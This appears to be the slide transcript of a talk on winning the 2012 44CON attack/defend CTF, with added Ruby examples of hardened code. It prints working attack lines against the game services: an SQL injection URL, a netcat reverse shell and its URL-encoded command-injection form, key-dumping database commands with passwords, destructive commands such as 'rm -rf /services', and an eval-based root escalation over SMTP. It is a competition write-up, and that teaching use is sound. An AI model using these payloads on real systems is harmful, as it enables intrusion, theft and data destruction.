playing 44con ctf for fun and profit
DESCRIPTION
Rundown of what it took to win the MWRLabs 44CON CTF in 2012 by the winning team 'Three Headed Monkeys'
TRANSCRIPT
Playing the 44Con CTF for fun & profit
Me
Software developer
Trying not to make things worse
Know a lot about bugs
CTF team 0xbadf00d
Contributor to io.smashthestack.org
CTF
"It's kind of like a Computer Science exam on acid"*
* CSAW CTF "About"page
Solving technical security challenges to get points.
CTF Types
Challenge-based
DEF CON quals
Ghost In The Shellcode
CSAW CTF
Attack/defend
DEF CON finals
44Con CTF (this year)
44CON CTF
44CON CTF - What we got
Virtual Machine image
IP Address
Scope of "attackable" machines
Attack & Defend
Kind of like a pentest (maybe, I've never done a pentest)
I have a plan:
Recon
Harden
Write exploits
Run riot
Get the girl
Save the world
Step 1 - Recon
I'd rather be offline than owned
Self-recon
Capture traffic
Quick nmap of non-player servers
Recon - Services
Recon - Scoring
Regular "scoring rounds"
Score server stores new keys in services
Score server checks for previous keys?
Every 30 minutes
Not great if you're trying to see talks!
pastie
Pastie
Written in PHP
Pastes stored in a MySQL database
Recon shows keys are stored as pastes
PHP+MySQL - Can you tell what the vuln is yet?
Pastie vuln
Classic SQL injection
Pastie fix
It's not all pwnpwnpwn
Not very sexy
Updated to use prepared statements
Pastie exploit
I want keys!
Had a look at my own DB to figure out the query
Pastie exploit
https://ip/view/%'+and+lang+=+'text'+order+by+date+desc+--+
Pastie exploit - scripted
mailserver
Mailserver
SMTP and POP3 server
Keys are stored in emails
Written in Ruby
I don't know Ruby
~ 500 lines
Mailserver - vulnerability
???
This just runs whatever Ruby code you give it
Time to learn Ruby!
Mailserver - verification
Looking at the logs...
Mailserver - exploitation
I'm sure Ruby is lovely...
... but let's just find some code to copy
Mailserver - exploitation
Mailserver - scripted exploitation
auth
Auth
Running on port 23500
Auth
Auth - vulnerability
Source analysis 101
Auth - exploitation
Classic stack buffer overflow
Overwrite return address with value of my choice
Remote code execution.....
....right?
Auth - exploitation
Welcome to CTF rage
Auth - exploitation
Just put a valid writable address in the buffer ptr!
Easy if this was a 32bit process.
Our memory space is annoying.
Auth - exploitation
gdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth
0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth
0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth
0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (read-only)
Auth - exploitation
Time's up!
No remote code execution :-(
Very limited DoS
Crash process
Restarts automatically
servicemon
Servicemon
Web page
Looks like it monitors the other services
Ruby again
Servicemon - vulnerability
Command execution of "filelist" parameter
Servicemon - exploitation
Never mind keys, I want a shell
contestant@ubuntu:~$ nc -l 31337 -e /bin/sh
nc: invalid option -- 'e'
Servicemon - exploitation
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f
*cracks knuckles*
http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202>%261%7Cnc%20192.168.1.75%2031337%20>%2Ftmp%2Ff
Servicemon - exploitation
contestant@ubuntu:~$ nc -lv 31337
Connection from 192.168.1.72 port 31337 [tcp/*] accepted
$ whoami
contestant
$ pwd
/services/servicemon
Now we can have some fun!
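An added example (not servicemon's own code) of what the /hash endpoint should have done with the "filelist" parameter: the talk shows that the parameter was spliced into a shell command, so "notafile||..." ran the attacker's command. Here no shell is involved at all; each name is checked against a narrow grammar, confined to one directory, and hashed in-process, and every rejection is logged. The directory, file names and return shape are assumptions.

```ruby
# Added example, not servicemon's code. The talk's /hash endpoint passed the
# "filelist" parameter into a shell command, so "notafile||<command>" ran the
# command. This version (names and directory are assumptions) never reaches a
# shell: it validates each name, confines it to one directory and hashes in-process.
require 'digest'
require 'tmpdir'

NAME_RE = /\A[A-Za-z0-9_.-]+\z/   # no '/', whitespace or shell metacharacters

# Returns {name => sha256} for every requested file, or nil if any entry is
# rejected. Rejections are appended to log so an injection attempt leaves a trace.
def hash_files(filelist, base_dir, log = [])
  base = File.realpath(base_dir)
  result = {}
  filelist.to_s.split(',').each do |name|
    unless NAME_RE.match?(name)
      log << "rejected filelist entry: #{name.inspect}"
      return nil
    end
    path = File.join(base, name)
    # realpath resolves symlinks; the file must still live under base.
    unless File.file?(path) && File.realpath(path).start_with?(base + File::SEPARATOR)
      log << "rejected path outside #{base}: #{name.inspect}"
      return nil
    end
    result[name] = Digest::SHA256.file(path).hexdigest
  end
  result
end

# Constructed demo: one real file in a temp dir, then the talk's payload shape
# with a harmless command. Returns [accepted result, rejected result, log].
def sample_run
  Dir.mktmpdir do |dir|
    File.write(File.join(dir, 'a.txt'), 'hello')
    log = []
    ok = hash_files('a.txt', dir, log)
    bad = hash_files('notafile||true', dir, log)   # now just data, never executed
    [ok, bad, log]
  end
end
```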
rampage
Steal all the keys
mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;"
mysql --user=pastie --password=J@cobsClub\$ paste -e "select pastie from pastie order by date desc limit 1;"
OUTPUT=$(redis-cli -r 1 keys \* | tail -n 1)
redis-cli -r 1 lrange $OUTPUT 0 1
Leave a calling card
echo 'Look behind you! A three-headed monkey!' > /services/pastie/.win
Annoy
echo 'export PROMPT_COMMAND="cd"' >> ~/.bashrc
echo exit >> ~/.bashrc
rm -rf /services
escalation
Escalation
Getting keys is fine
Getting shells is better
Getting root is best
Escalation - the hard way
$ find /etc -writable
/etc/init/mail.conf
/etc/init/auth.conf
Escalation - the hard way
USER PID TTY STAT COMMAND
root 8680 ? Ss /services/auth/auth
Escalation - the hard way
Next time auth respawns we will get a root shell
Lame DoS to the rescue!
perl -e 'print "auth " . "A"x1100 . "\n"' | nc ip 23500
Connection from 192.168.1.73 port 31337 [tcp/*] accepted
# whoami
root
Escalation - the easy way
220 Mail Service ready (33147)
HELO
250 Requested mail action okay, completed
EXPN respond(client, `whoami`)
root
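An added example (not the CTF mailserver's source) for the mailserver vulnerability ("this just runs whatever Ruby code you give it") and for the EXPN escalation above: the unsafe handler passes the client's argument to eval, which is why one SMTP line is enough to run code as the service's user; the hardened handler only knows a fixed table of verbs and treats arguments as data. The verb table and reply strings are assumptions.

```ruby
# Added example, not the CTF mailserver's code. It contrasts the pattern the
# talk describes (the server evaluates whatever the client sends as Ruby) with
# a dispatcher that only knows a fixed table of verbs. Replies are assumed.

# Vulnerable pattern: anything after an unknown verb goes to eval, so a line
# such as "EXPN <ruby expression>" runs with the server's privileges.
def handle_unsafe(line)
  verb, arg = line.strip.split(' ', 2)
  return '250 Requested mail action okay, completed' if verb == 'HELO'
  eval(arg.to_s).to_s
end

# Hardened pattern: an explicit allowlist of verbs. Arguments are checked
# against a narrow grammar and are never interpreted as code.
HOSTNAME_RE = /\A[A-Za-z0-9.-]{1,253}\z/

HANDLERS = {
  'HELO' => lambda { |arg|
    HOSTNAME_RE.match?(arg) ? '250 Requested mail action okay, completed' : '501 Syntax error in parameters'
  },
  'EXPN' => lambda { |_arg| '502 Command not implemented' },
  'QUIT' => lambda { |_arg| '221 Service closing transmission channel' },
}.freeze

def handle_safe(line)
  verb, arg = line.strip.split(' ', 2)
  handler = HANDLERS[verb.to_s.upcase]
  return '500 Syntax error, command unrecognized' unless handler
  handler.call(arg.to_s)   # the argument is passed to a fixed handler, never to eval
end
```

The same dispatch table is where the root-shell "easy way" is closed off: EXPN is answered with a fixed reply instead of being interpreted.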
summary
Summary
CTFs are fun!
http://smashthestack.org - start with io
http://overthewire.org
http://hackthissite.org
questions